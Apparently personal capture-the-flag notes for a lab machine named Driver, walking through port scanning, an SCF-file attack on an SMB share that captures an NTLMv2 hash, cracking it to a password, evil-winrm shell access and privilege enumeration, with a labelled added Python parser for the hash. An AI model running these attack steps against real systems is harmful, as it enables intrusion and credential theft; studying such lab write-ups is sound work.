Machine - Driver

  • nmap: sudo nmap -p- -sS --min-rate 5000 --open -vvv -n -Pn 10.10.11.106 -oG allPorts
    • 80, 135, 445, 5985
  • nmap: nmap -sC -sV -p80,135,445,5985 10.10.11.106 -oN ports
80/tcp   open  http         Microsoft IIS httpd 10.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=MFP Firmware Update Center. Please enter password for admin
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp  open  msrpc        Microsoft Windows RPC
445/tcp  open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time:
|   date: 2021-10-20T02:45:17
|_  start_date: 2021-10-20T01:04:23
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
|_clock-skew: mean: 7h15m07s, deviation: 0s, median: 7h15m07s
  • fuzzing port 80
    • Images folder
  • SMB seems to be restricted
  • fuzzing port 4985
    • nothing
  • when going to port 80, it asks for basic auth
    • the server reports itself as MFP Firmware Update
    • the user/password is admin:admin
    • there is a page that allows uploading things
    • also the pages have a php extension
    • let’s wfuzz with the credentials now
      • nothing interesting
  • msrpc (135)
    • rpcdump.py IP
      • showed a lot of RPC endpoints.
    • tried rpcclient and samrdump to ask things, but I need an SMB user
  • HINT :( use SMB Share – SCF File Attacks
    • we got the result back
[SMB] NTLMv2 Client   : 10.10.11.106
[SMB] NTLMv2 Username : DRIVER\tony
[SMB] NTLMv2 Hash     : tony::DRIVER:59c20c5e0b3b1b80:1949578739EFD2DE8E3BD2D2E9EC775B:010100000000000026C9947767C5D7013E2061EAB9C8BF3F00000000020000000000000000000000
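Added example (not part of the writeup): a Python parser for a captured NTLMv2 line in the user::domain:server_challenge:NTProofStr:blob form shown above, run against that capture. It shows that what was captured is a challenge-response (an HMAC over challenges and a blob), not the password itself, and decodes the blob's FILETIME and AV_PAIR list, which is useful when correlating the coerced authentication against server-side logs; field layout follows MS-NLMP, and the sample line is the one from the capture above.

```python
import struct
from datetime import datetime, timedelta, timezone

# The capture line shown above (user::domain:server_challenge:NTProofStr:blob).
SAMPLE = ("tony::DRIVER:59c20c5e0b3b1b80:1949578739EFD2DE8E3BD2D2E9EC775B:"
          "010100000000000026C9947767C5D7013E2061EAB9C8BF3F00000000020000000000000000000000")

# AV_PAIR ids from MS-NLMP; name-type values are UTF-16LE, others are kept as hex.
AV_IDS = {1: "MsvAvNbComputerName", 2: "MsvAvNbDomainName", 3: "MsvAvDnsComputerName",
          4: "MsvAvDnsDomainName", 5: "MsvAvDnsTreeName", 6: "MsvAvFlags",
          7: "MsvAvTimestamp", 9: "MsvAvTargetName", 10: "MsvAvChannelBindings"}
TEXT_AV_IDS = {1, 2, 3, 4, 5, 9}


def filetime_to_datetime(ft: int) -> datetime:
    """FILETIME counts 100 ns ticks since 1601-01-01 UTC."""
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=ft // 10)


def parse_ntlmv2_line(line: str) -> dict:
    """Split a captured NTLMv2 line into its MS-NLMP fields."""
    user, _, domain, challenge, ntproofstr, blob_hex = line.strip().split(":")
    server_challenge = bytes.fromhex(challenge)
    proof = bytes.fromhex(ntproofstr)
    blob = bytes.fromhex(blob_hex)
    if len(server_challenge) != 8 or len(proof) != 16:
        raise ValueError("malformed NTLMv2 line")
    if blob[0] != 1 or blob[1] != 1:  # RespType / HiRespType must both be 1
        raise ValueError("not an NTLMv2 blob")
    timestamp = struct.unpack_from("<Q", blob, 8)[0]  # little-endian FILETIME
    client_challenge = blob[16:24]
    av_pairs, offset = [], 28  # 4 reserved bytes precede the AV_PAIR list
    while offset + 4 <= len(blob):
        av_id, av_len = struct.unpack_from("<HH", blob, offset)
        value = blob[offset + 4:offset + 4 + av_len]
        offset += 4 + av_len
        if av_id == 0:  # MsvAvEOL terminates the list
            break
        text = value.decode("utf-16-le") if av_id in TEXT_AV_IDS else value.hex()
        av_pairs.append((AV_IDS.get(av_id, f"Unknown-{av_id}"), text))
    return {
        "user": user, "domain": domain,
        "server_challenge": server_challenge.hex(),
        "ntproofstr": proof.hex(),  # HMAC-MD5 over challenge + blob, not the password
        "timestamp": filetime_to_datetime(timestamp),
        "client_challenge": client_challenge.hex(),
        "av_pairs": av_pairs,
    }


if __name__ == "__main__":
    for key, val in parse_ntlmv2_line(SAMPLE).items():
        print(f"{key:16} {val}")
```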
  • with john (john hashes.txt --wordlist=/usr/share/dict/rockyou.txt) we got the password liltony
  • with smbmap we can now enumerate: smbmap.py -u tony -p 'liltony' -d DRIVER -H 10.10.11.106
[+] IP: 10.10.11.106:445        Name: 10.10.11.106
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
  • let’s see which files are in the IPC$
[+] IP: 10.10.11.106:445        Name: 10.10.11.106
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        IPC$                                                    READ ONLY
        .\IPC$\*
        fr--r--r--                3 Sun Dec 31 23:45:16 1600    InitShutdown
        fr--r--r--                4 Sun Dec 31 23:45:16 1600    lsass
        fr--r--r--                3 Sun Dec 31 23:45:16 1600    ntsvcs
        fr--r--r--                3 Sun Dec 31 23:45:16 1600    scerpc
        fr--r--r--                1 Sun Dec 31 23:45:16 1600    Winsock2\CatalogChangeListener-2c0-0
        fr--r--r--                3 Sun Dec 31 23:45:16 1600    epmapper
        fr--r--r--                1 Sun Dec 31 23:45:16 1600    Winsock2\CatalogChangeListener-1c0-0
        fr--r--r--                3 Sun Dec 31 23:45:16 1600    LSM_API_service
        fr--r--r--                3 Sun Dec 31 23:45:16 1600    eventlog
        fr--r--r--                1 Sun Dec 31 23:45:16 1600    Winsock2\CatalogChangeListener-35c-0
        fr--r--r--                3 Sun Dec 31 23:45:16 1600    atsvc
        fr--r--r--                1 Sun Dec 31 23:45:16 1600    Winsock2\CatalogChangeListener-348-0
        fr--r--r--                4 Sun Dec 31 23:45:16 1600    spoolss
        fr--r--r--                1 Sun Dec 31 23:45:16 1600    Winsock2\CatalogChangeListener-4d4-0
        fr--r--r--                8 Sun Dec 31 23:45:16 1600    wkssvc
        fr--r--r--                3 Sun Dec 31 23:45:16 1600    trkwks
        fr--r--r--                1 Sun Dec 31 23:45:16 1600    Winsock2\CatalogChangeListener-234-0
        fr--r--r--                6 Sun Dec 31 23:45:16 1600    srvsvc
        fr--r--r--                1 Sun Dec 31 23:45:16 1600    vgauth-service
        fr--r--r--                1 Sun Dec 31 23:45:16 1600    Winsock2\CatalogChangeListener-23c-0
        fr--r--r--                2 Sun Dec 31 23:45:16 1600    MsFteWds
        fr--r--r--                1 Sun Dec 31 23:45:16 1600    TDLN-3856-41
        fr--r--r--                1 Sun Dec 31 23:45:16 1600    TDLN-1780-41
        fr--r--r--                1 Sun Dec 31 23:45:16 1600    iisipmda2afe5a-1893-4d91-9622-8f1df9a8508d
        fr--r--r--                1 Sun Dec 31 23:45:16 1600    iislogpipeef2b995f-4320-43a8-971e-077643546759
        fr--r--r--                1 Sun Dec 31 23:45:16 1600    PSHost.132791730432182095.1068.DefaultAppDomain.wsmprovhost
        fr--r--r--                1 Sun Dec 31 23:45:16 1600    IISFCGI-29c90af3-97f6-4028-8f4a-12e246f3c9b7
  • Now that we have SMB access, we can try to use MSRPC
  • samrdump.py DRIVER/tony:liltony@10.10.11.106
  • users in the system: john, tony, Guest, Administrator
  • now we can try to use evil-winrm
  • evil-winrm -i 10.10.11.106 -u tony -p liltony
  • and we got the shell as tony yay!!
  • then we execute whoami /priv
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== =======
SeShutdownPrivilege           Shut down the system                 Enabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Enabled
SeTimeZonePrivilege           Change the time zone                 Enabled
  • let’s enumerate with winpeas
    • john is an administrator user
  • let’s try Watson now to see if there are vulnerabilities
    • didn’t work :(
  • let’s try seatbelt
    • shows something weird
=== Checking for DPAPI Master Keys (Current User) ===

    Folder       : C:\Users\tony\AppData\Roaming\Microsoft\Protect\S-1-5-21-3114857038-1253923253-2196841645-1003

    MasterKey    : 75b6682f-d20b-4e4f-b333-2808ba01972c
        Accessed : 9/7/2021 11:50:08 PM
        Modified : 9/7/2021 11:50:08 PM

    MasterKey    : 78efb3d3-f3f1-4076-98d1-6e34190a5d86
        Accessed : 6/11/2021 7:01:02 AM
        Modified : 6/11/2021 7:01:02 AM

  [*] Use the Mimikatz "dpapi::masterkey" module with appropriate arguments (/rpc) to decrypt
  • let’s see what this Mimikatz is…
  • HINT: there is an exploit, printnightmare-